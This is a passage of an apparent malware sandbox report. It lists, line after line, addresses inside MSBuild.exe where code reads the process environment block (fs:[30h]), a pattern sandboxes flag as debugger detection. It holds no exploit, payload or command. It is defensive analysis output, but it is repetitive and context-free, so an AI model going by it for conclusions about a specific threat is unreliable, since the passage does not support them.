            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01440115 mov eax, dword ptr fs:[00000030h]5_2_01440115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142A118 mov ecx, dword ptr fs:[00000030h]5_2_0142A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142A118 mov eax, dword ptr fs:[00000030h]5_2_0142A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142A118 mov eax, dword ptr fs:[00000030h]5_2_0142A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142A118 mov eax, dword ptr fs:[00000030h]5_2_0142A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137C156 mov eax, dword ptr fs:[00000030h]5_2_0137C156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01387152 mov eax, dword ptr fs:[00000030h]5_2_01387152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01386154 mov eax, dword ptr fs:[00000030h]5_2_01386154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01386154 mov eax, dword ptr fs:[00000030h]5_2_01386154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01379148 mov eax, dword ptr fs:[00000030h]5_2_01379148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01379148 mov eax, dword ptr fs:[00000030h]5_2_01379148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01379148 mov eax, dword ptr fs:[00000030h]5_2_01379148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01379148 mov eax, dword ptr fs:[00000030h]5_2_01379148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014461C3 mov eax, dword ptr fs:[00000030h]5_2_014461C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014461C3 mov eax, dword ptr fs:[00000030h]5_2_014461C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139B1B0 mov eax, dword ptr fs:[00000030h]5_2_0139B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014551CB mov eax, dword ptr fs:[00000030h]5_2_014551CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137A197 mov eax, dword ptr fs:[00000030h]5_2_0137A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137A197 mov eax, dword ptr fs:[00000030h]5_2_0137A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137A197 mov eax, dword ptr fs:[00000030h]5_2_0137A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014561E5 mov eax, dword ptr fs:[00000030h]5_2_014561E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013D7190 mov eax, dword ptr fs:[00000030h]5_2_013D7190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C0185 mov eax, dword ptr fs:[00000030h]5_2_013C0185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014271F9 mov esi, dword ptr fs:[00000030h]5_2_014271F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B01F8 mov eax, dword ptr fs:[00000030h]5_2_013B01F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143C188 mov eax, dword ptr fs:[00000030h]5_2_0143C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143C188 mov eax, dword ptr fs:[00000030h]5_2_0143C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h]5_2_013A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h]5_2_013A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h]5_2_013A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h]5_2_013A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h]5_2_013A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h]5_2_013A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h]5_2_013A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h]5_2_013A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h]5_2_013A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h]5_2_013A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h]5_2_013A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h]5_2_013A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h]5_2_013A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013851ED mov eax, dword ptr fs:[00000030h]5_2_013851ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0140019F mov eax, dword ptr fs:[00000030h]5_2_0140019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0140019F mov eax, dword ptr fs:[00000030h]5_2_0140019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0140019F mov eax, dword ptr fs:[00000030h]5_2_0140019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0140019F mov eax, dword ptr fs:[00000030h]5_2_0140019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014311A4 mov eax, dword ptr fs:[00000030h]5_2_014311A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014311A4 mov eax, dword ptr fs:[00000030h]5_2_014311A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014311A4 mov eax, dword ptr fs:[00000030h]5_2_014311A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014311A4 mov eax, dword ptr fs:[00000030h]5_2_014311A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BD1D0 mov eax, dword ptr fs:[00000030h]5_2_013BD1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BD1D0 mov ecx, dword ptr fs:[00000030h]5_2_013BD1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013FE1D0 mov eax, dword ptr fs:[00000030h]5_2_013FE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013FE1D0 mov eax, dword ptr fs:[00000030h]5_2_013FE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013FE1D0 mov ecx, dword ptr fs:[00000030h]5_2_013FE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013FE1D0 mov eax, dword ptr fs:[00000030h]5_2_013FE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013FE1D0 mov eax, dword ptr fs:[00000030h]5_2_013FE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01406050 mov eax, dword ptr fs:[00000030h]5_2_01406050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137A020 mov eax, dword ptr fs:[00000030h]5_2_0137A020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137C020 mov eax, dword ptr fs:[00000030h]5_2_0137C020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142705E mov ebx, dword ptr fs:[00000030h]5_2_0142705E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142705E mov eax, dword ptr fs:[00000030h]5_2_0142705E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01455060 mov eax, dword ptr fs:[00000030h]5_2_01455060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0140106E mov eax, dword ptr fs:[00000030h]5_2_0140106E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139E016 mov eax, dword ptr fs:[00000030h]5_2_0139E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139E016 mov eax, dword ptr fs:[00000030h]5_2_0139E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139E016 mov eax, dword ptr fs:[00000030h]5_2_0139E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139E016 mov eax, dword ptr fs:[00000030h]5_2_0139E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01404000 mov ecx, dword ptr fs:[00000030h]5_2_01404000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01391070 mov eax, dword ptr fs:[00000030h]5_2_01391070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01391070 mov ecx, dword ptr fs:[00000030h]5_2_01391070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01391070 mov eax, dword ptr fs:[00000030h]5_2_01391070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01391070 mov eax, dword ptr fs:[00000030h]5_2_01391070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01391070 mov eax, dword ptr fs:[00000030h]5_2_01391070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01391070 mov eax, dword ptr fs:[00000030h]5_2_01391070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01391070 mov eax, dword ptr fs:[00000030h]5_2_01391070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01391070 mov eax, dword ptr fs:[00000030h]5_2_01391070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01391070 mov eax, dword ptr fs:[00000030h]5_2_01391070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01391070 mov eax, dword ptr fs:[00000030h]5_2_01391070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01391070 mov eax, dword ptr fs:[00000030h]5_2_01391070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01391070 mov eax, dword ptr fs:[00000030h]5_2_01391070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01391070 mov eax, dword ptr fs:[00000030h]5_2_01391070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AC073 mov eax, dword ptr fs:[00000030h]5_2_013AC073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013FD070 mov ecx, dword ptr fs:[00000030h]5_2_013FD070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01382050 mov eax, dword ptr fs:[00000030h]5_2_01382050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AB052 mov eax, dword ptr fs:[00000030h]5_2_013AB052
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144903E mov eax, dword ptr fs:[00000030h]5_2_0144903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144903E mov eax, dword ptr fs:[00000030h]5_2_0144903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144903E mov eax, dword ptr fs:[00000030h]5_2_0144903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144903E mov eax, dword ptr fs:[00000030h]5_2_0144903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014550D9 mov eax, dword ptr fs:[00000030h]5_2_014550D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014020DE mov eax, dword ptr fs:[00000030h]5_2_014020DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014060E0 mov eax, dword ptr fs:[00000030h]5_2_014060E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B909C mov eax, dword ptr fs:[00000030h]5_2_013B909C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AD090 mov eax, dword ptr fs:[00000030h]5_2_013AD090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AD090 mov eax, dword ptr fs:[00000030h]5_2_013AD090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01385096 mov eax, dword ptr fs:[00000030h]5_2_01385096
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138208A mov eax, dword ptr fs:[00000030h]5_2_0138208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137D08D mov eax, dword ptr fs:[00000030h]5_2_0137D08D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137C0F0 mov eax, dword ptr fs:[00000030h]5_2_0137C0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C20F0 mov ecx, dword ptr fs:[00000030h]5_2_013C20F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013880E9 mov eax, dword ptr fs:[00000030h]5_2_013880E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0137A0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A50E4 mov eax, dword ptr fs:[00000030h]5_2_013A50E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A50E4 mov ecx, dword ptr fs:[00000030h]5_2_013A50E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A90DB mov eax, dword ptr fs:[00000030h]5_2_013A90DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h]5_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C0 mov ecx, dword ptr fs:[00000030h]5_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C0 mov ecx, dword ptr fs:[00000030h]5_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h]5_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C0 mov ecx, dword ptr fs:[00000030h]5_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C0 mov ecx, dword ptr fs:[00000030h]5_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h]5_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h]5_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h]5_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h]5_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h]5_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h]5_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h]5_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h]5_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h]5_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h]5_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h]5_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h]5_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014460B8 mov eax, dword ptr fs:[00000030h]5_2_014460B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014460B8 mov ecx, dword ptr fs:[00000030h]5_2_014460B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013FD0C0 mov eax, dword ptr fs:[00000030h]5_2_013FD0C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013FD0C0 mov eax, dword ptr fs:[00000030h]5_2_013FD0C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01455341 mov eax, dword ptr fs:[00000030h]5_2_01455341
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01377330 mov eax, dword ptr fs:[00000030h]5_2_01377330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01402349 mov eax, dword ptr fs:[00000030h]5_2_01402349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01402349 mov eax, dword ptr fs:[00000030h]5_2_01402349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01402349 mov eax, dword ptr fs:[00000030h]5_2_01402349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01402349 mov eax, dword ptr fs:[00000030h]5_2_01402349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01402349 mov eax, dword ptr fs:[00000030h]5_2_01402349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01402349 mov eax, dword ptr fs:[00000030h]5_2_01402349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01402349 mov eax, dword ptr fs:[00000030h]5_2_01402349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01402349 mov eax, dword ptr fs:[00000030h]5_2_01402349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01402349 mov eax, dword ptr fs:[00000030h]5_2_01402349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01402349 mov eax, dword ptr fs:[00000030h]5_2_01402349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01402349 mov eax, dword ptr fs:[00000030h]5_2_01402349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01402349 mov eax, dword ptr fs:[00000030h]5_2_01402349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01402349 mov eax, dword ptr fs:[00000030h]5_2_01402349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01402349 mov eax, dword ptr fs:[00000030h]5_2_01402349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01402349 mov eax, dword ptr fs:[00000030h]5_2_01402349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AF32A mov eax, dword ptr fs:[00000030h]5_2_013AF32A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144A352 mov eax, dword ptr fs:[00000030h]5_2_0144A352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0140035C mov eax, dword ptr fs:[00000030h]5_2_0140035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0140035C mov eax, dword ptr fs:[00000030h]5_2_0140035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0140035C mov eax, dword ptr fs:[00000030h]5_2_0140035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0140035C mov ecx, dword ptr fs:[00000030h]5_2_0140035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0140035C mov eax, dword ptr fs:[00000030h]5_2_0140035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0140035C mov eax, dword ptr fs:[00000030h]5_2_0140035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143F367 mov eax, dword ptr fs:[00000030h]5_2_0143F367
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137C310 mov ecx, dword ptr fs:[00000030h]5_2_0137C310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A0310 mov ecx, dword ptr fs:[00000030h]5_2_013A0310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BA30B mov eax, dword ptr fs:[00000030h]5_2_013BA30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BA30B mov eax, dword ptr fs:[00000030h]5_2_013BA30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BA30B mov eax, dword ptr fs:[00000030h]5_2_013BA30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142437C mov eax, dword ptr fs:[00000030h]5_2_0142437C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01387370 mov eax, dword ptr fs:[00000030h]5_2_01387370
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01387370 mov eax, dword ptr fs:[00000030h]5_2_01387370
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01387370 mov eax, dword ptr fs:[00000030h]5_2_01387370
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0140930B mov eax, dword ptr fs:[00000030h]5_2_0140930B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0140930B mov eax, dword ptr fs:[00000030h]5_2_0140930B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0140930B mov eax, dword ptr fs:[00000030h]5_2_0140930B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01379353 mov eax, dword ptr fs:[00000030h]5_2_01379353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01379353 mov eax, dword ptr fs:[00000030h]5_2_01379353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144132D mov eax, dword ptr fs:[00000030h]5_2_0144132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144132D mov eax, dword ptr fs:[00000030h]5_2_0144132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137D34C mov eax, dword ptr fs:[00000030h]5_2_0137D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137D34C mov eax, dword ptr fs:[00000030h]5_2_0137D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014063C0 mov eax, dword ptr fs:[00000030h]5_2_014063C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143C3CD mov eax, dword ptr fs:[00000030h]5_2_0143C3CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143B3D0 mov ecx, dword ptr fs:[00000030h]5_2_0143B3D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B33A0 mov eax, dword ptr fs:[00000030h]5_2_013B33A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B33A0 mov eax, dword ptr fs:[00000030h]5_2_013B33A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A33A5 mov eax, dword ptr fs:[00000030h]5_2_013A33A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01378397 mov eax, dword ptr fs:[00000030h]5_2_01378397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01378397 mov eax, dword ptr fs:[00000030h]5_2_01378397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01378397 mov eax, dword ptr fs:[00000030h]5_2_01378397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143F3E6 mov eax, dword ptr fs:[00000030h]5_2_0143F3E6
